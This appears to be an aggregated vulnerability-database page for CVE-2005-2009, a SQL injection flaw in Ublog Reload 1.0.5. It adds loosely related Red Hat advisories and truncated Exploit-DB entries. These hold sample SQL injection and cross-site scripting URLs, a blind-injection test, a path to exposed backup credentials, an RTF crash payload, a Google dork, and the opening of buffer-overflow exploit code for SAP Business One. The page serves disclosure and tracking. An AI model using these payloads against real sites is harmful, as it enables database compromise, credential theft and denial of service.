CVE-2005-2009
Published 2005-06-20
CVE-2005-2009: Multiple SQL injection vulnerabilities in Ublog Reload 1.0.5 allow remote attackers to execute arbitrary SQL commands via the (1) ci, (2) d, or (3) m parameter…
Priority P338·high·7.5·CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.17% (63.6th percentile)
Multiple SQL injection vulnerabilities in Ublog Reload 1.0.5 allow remote attackers to execute arbitrary SQL commands via the (1) ci, (2) d, or (3) m parameter to index.asp, or the (4) bi parameter to blog_comment.asp.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ublog | reload | — | — |
CVSS provenance
nvd·v2.0·7.5·HIGH·AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat·7.5·HIGH
GHSA
GHSA-xw66-7hgg-w34f: Multiple SQL injection vulnerabilities in Ublog Reload 1
ghsa_unreviewed·2022-05-01
CVE-2005-2009 [HIGH] GHSA-xw66-7hgg-w34f: Multiple SQL injection vulnerabilities in Ublog Reload 1
Multiple SQL injection vulnerabilities in Ublog Reload 1.0.5 allow remote attackers to execute arbitrary SQL commands via the (1) ci, (2) d, or (3) m parameter to index.asp, or the (4) bi parameter to blog_comment.asp.
Red Hat
kernel: tcf_fill_node() infoleak due to typo in 9ef1d4c7
vendor_redhat·2009-10-08·CVSS 4.9
CVE-2009-3612 [MEDIUM] kernel: tcf_fill_node() infoleak due to typo in 9ef1d4c7
The tcf_fill_node function in net/sched/cls_api.c in the netlink subsystem in the Linux kernel 2.6.x before 2.6.32-rc5, and 2.4.37.6 and earlier, does not initialize a certain tcm__pad2 structure member, which might allow local users to obtain sensitive information from kernel memory via unspecified vectors. NOTE: this issue exists because of an incomplete fix for CVE-2005-4881.
Statement: This issue is not planned to be fixed in Red Hat Enterprise Linux 3 due to this product being in Production 3 of its maintenance life-cycle, where only qualified security errata of important or critical impact are addressed.
For further information about the Errata Support Policy, visit: https://access.redhat.com/support/policy/updates/errata/
Red Hat
php: exif_read_data crash on corrupted JPEG files
vendor_redhat·2009-06-18·CVSS 5.0
CVE-2009-2687 [MEDIUM] php: exif_read_data crash on corrupted JPEG files
The exif_read_data function in the Exif module in PHP before 5.2.10 allows remote attackers to cause a denial of service (crash) via a malformed JPEG image with invalid offset fields, a different issue than CVE-2005-3353.
Red Hat
firefox: does not properly prevent the literal rendering of homoglyph characters in IDN domain names (spoof URLs and conduct phishing attacks)
vendor_redhat·2009-02-16·CVSS 7.5
CVE-2009-0652 [HIGH] firefox: does not properly prevent the literal rendering of homoglyph characters in IDN domain names (spoof URLs and conduct phishing attacks)
The Internationalized Domain Names (IDN) blacklist in Mozilla Firefox 3.0.6 and other versions before 3.0.9; Thunderbird before 2.0.0.21; and SeaMonkey before 1.1.15 does not include box-drawing characters, which allows remote attackers to spoof URLs and conduct phishing attacks, as demonstrated by homoglyphs of the / (slash) and ? (question mark) characters in a subdomain of a .cn domain name, a different vulnerability than CVE-2005-0233. NOTE: some third parties claim that 3.0.6 is not affected, but much older versions perhaps are affected.
No detection rules found.
Exploit-DB
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-11-30
CVE-2009-4988 SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: sap_2005_license.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SAP Business One License Manager 2005 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SAP Business One 2005
License Manager 'NT Naming Service' A and B releases. By sending an
excessively long string the stack is overwritten enabling arbitrary
code execution.
},
'Author' => 'Jacopo Cervini',
'Version' => '$Re
Exploit-DB
paFileDB 3.1 - Cross-Site Scripting
exploitdb·2009-12-26
CVE-2005-0952 paFileDB 3.1 - Cross-Site Scripting
---
| # Title : paFileDB 3.1 Cross Site Scripting Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # EDB-ID : 10667 |
| # CVE-ID : () |
| # OSVDB-ID : () |
| # DAte :16/12/2009 |
| # Verified : |
| # Web Site : www.iq-ty.com |
| # Published: |
| # Script : paFileDB 3.1 http://www.bwady.com/vb |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
| # Bug : XSS |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1- http://127.0.0.1/tools/pafiledb.php?action=email&id=1>">alert(213771818860)%3B&rate=dorate&rating=1&B1=hacked%20by%20indoushka
|
=======
Exploit-DB
TomatoCart - Backup
exploitdb·2009-12-26
---
| # Title : TomatoCart Backup Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # EDB-ID : 10683 |
| # CVE-ID : () |
| # OSVDB-ID : () |
| # DAte :16/12/2009 |
| # Verified : |
| # Web Site : www.iq-ty.com |
| # Published: |
| # Script : Powered by TomatoCart (Copyright (c) 2009 Wuxi Elootec Technology Co., Ltd; Copyright (c) 2005 osCommerce)
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
| # Bug : Backup |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1- http://127.0.0.1/tomatocart/admin/backups/
|
| 2- look in lin 42 u find the user and pass
|
============================
Exploit-DB
vCard PRO 3.1 - Cross-Site Scripting
exploitdb·2009-12-26
---
| # Title : vCard PRO 3.1 Cross Site Scripting Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # EDB-ID : 10670 |
| # CVE-ID : () |
| # OSVDB-ID : () |
| # DAte :16/12/2009 |
| # Verified : |
| # Web Site : www.iq-ty.com |
| # Published: |
| # Script : Powered by vCard PRO 3.1 Translated by SCDT - SWiSHE Cards : SWiSHE.NeT ©2005
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
| # Bug : XSS |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1- http://127.0.0.1:80/vcard/newcards.php?page=1alert(+213771818860)
| 2- http://127.0.0.1/vcard/create.php?card_id=1>">a
Exploit-DB
ActiveBuyandSell 6.2 - 'buyersend.asp?catid' Blind SQL Injection
exploitdb·2009-12-17
CVE-2005-2062 ActiveBuyandSell 6.2 - 'buyersend.asp?catid' Blind SQL Injection
---
[?] {In The Name Of Allah The Mercifull}
[?]
[~] Tybe: (buyersend.asp catid) Blind SQL Injection Vulnerability
[~] Vendor: :www.activewebsoftwares.com
[*] Software: ActiveBuyandSell v 6.2
[*] author: ((R3d-D3v!L))
[*] Date: 18.dec.2009
[*] T!ME: 12:00 am
[?] Home: WwW.xP10.ME
[?] contact: N/A
[?]
[?] {DEV!L'5 of SYST3M}
[*] Err0r C0N50L3:
[*] http://server/demoactivebuyandsell/buyersend.asp?catid={offsec}
[*]{offsec}
7Ru3 : buyersend.asp?catid=1 and 1=1
f4L53: buyersend.asp?catid=1 and 1=2
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
! GAZA !N 0uR HEART's blood and M!ND
[~]-----------------------------{D3V!L
Exploit-DB
SAP Business One 2005-A License Manager - Remote Buffer Overflow
exploitdb·2009-08-01
CVE-2009-4988 SAP Business One 2005-A License Manager - Remote Buffer Overflow
---
#!/usr/bin/python
import socket, time
#########################################INFO################################################
# NT_Naming_Service.exe (License Manager 2005 for SAP Business One 2005-A) is #
# vulnerable to a stack-based buffer overflow allowing for full system compromise by #
# an unauthenticated user that has TCP/IP access to SAP's license service on TCP port 30000.#
# Mike Arnold ---> mikey27 .::at::. hotmail.com #
############################################################################################
header = ("########################################################################\r\n"
"# SAP Business One 2005-A License Manager remote overflow PoC #\r\n"
"# Tested on 2005-A (6.80.123)
Exploit-DB
phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
exploitdb·2009-07-21
CVE-2009-4681 phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
---
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
[»] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities
[»] Script: [ Web Business Directory 1.0 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.phpdirectorysource.com/ ]
[»] Founder: [ Moudi ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ Copyright 2005-2006 phpDirectorySource™, all rights reserved ]
[»] Price: [ $75.00 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit SQL INJECTION + LIVE : vulnerability ]===
[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=
[»
Exploit-DB
QIP 2005 - Malformed Rich Text Message Remote Denial of Service
exploitdb·2009-02-04
CVE-2009-0769 QIP 2005 - Malformed Rich Text Message Remote Denial of Service
---
source: https://www.securityfocus.com/bid/33609/info
QIP 2005 is prone to a remote denial-of-service vulnerability.
Exploiting this issue may allow attackers to cause the application to hang and consume excessive computer resources, denying service to legitimate users.
NOTE: This issue may occur in a third-party component used by QIP 2005, but this has not been confirmed.
This issue affects QIP 2005 build 8082; other versions may also be vulnerable.
{\rtf\pict\&&}
Exploit-DB
Joomla! Component gigCalendar 1.0 - SQL Injection
exploitdb·2009-01-13
CVE-2009-0726 Joomla! Component gigCalendar 1.0 - SQL Injection
---
#############################################################
Joomla Component com_gigcal(gigcal_gigs_id) SQL-injection
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability : SQL injection
#[~] Google Dork : inurl:com_gigcal
#[!] Name : GigCalendar
#[!] creationDate : Dec 2005
#[!] Created by : Graham Spice, David Richards
#[!] AuthorEmail : [email protected]
#[!] Site : www.gigcalendar.net
#[!] Version : 1.0
#[!] Download : http://joomlacode.org/gf/project/gigcalendar/frs/?action=FrsReleaseBrowse&frs_package_id=214
################################
Exploit-DB
Ublog Reload 1.0.5 - 'index.asp' Multiple SQL Injections
exploitdb·2005-06-20
CVE-2005-2009 Ublog Reload 1.0.5 - 'index.asp' Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/13991/info
Ublog Reload is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
http://www.example.com/UblogReload/index.asp?ci='62&s=category
http://www.example.com/UblogReload/index.asp?d=11'&m=6&y=2005&s=day
http://www.example.com/UblogReload/index.asp?m=6'&y=2005&s=month
Exploit-DB
Ublog Reload 1.0.5 - 'blog_comment.asp?y' SQL Injection
exploitdb·2005-06-20
CVE-2005-2009 Ublog Reload 1.0.5 - 'blog_comment.asp?y' SQL Injection
---
source: https://www.securityfocus.com/bid/13991/info
Ublog Reload is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
http://www.example.com/UblogReload/blog_comment.asp?bi=71&m=6&y=2005'&d=&s=category
Exploit-DB
Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2005-05-07·CVSS 4.3
CVE-2005-0549 [MEDIUM] Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting Vulnerabilities
---
Sun Solaris AnswerBook2 is reported prone to multiple cross-site scripting vulnerabilities because the software fails to properly sanitize user-supplied data. Exploits will allow arbitrary HTML and script code to run in a victim's browser, allowing the attacker to steal cookie-based credentials and launch other attacks.
The Search function and the AnswerBook2 admin interface are affected.
AnswerBook2 1.4.4 and prior versions are vulnerable.
Bugtraq ID: 12746
Class: Input Validation Error
CVE: CVE-2005-0548
CVE-2005-0549
Remote: Yes
Local: No
Published: Mar 07 2005 12:00AM
Updated: Dec 11 2009 03:44PM
Credit: Discovery is credited to Thomas Liam Romanis.
Vulnerable: Sun AnswerBook2 1.4.4
Sun AnswerBook2 1.4.3
S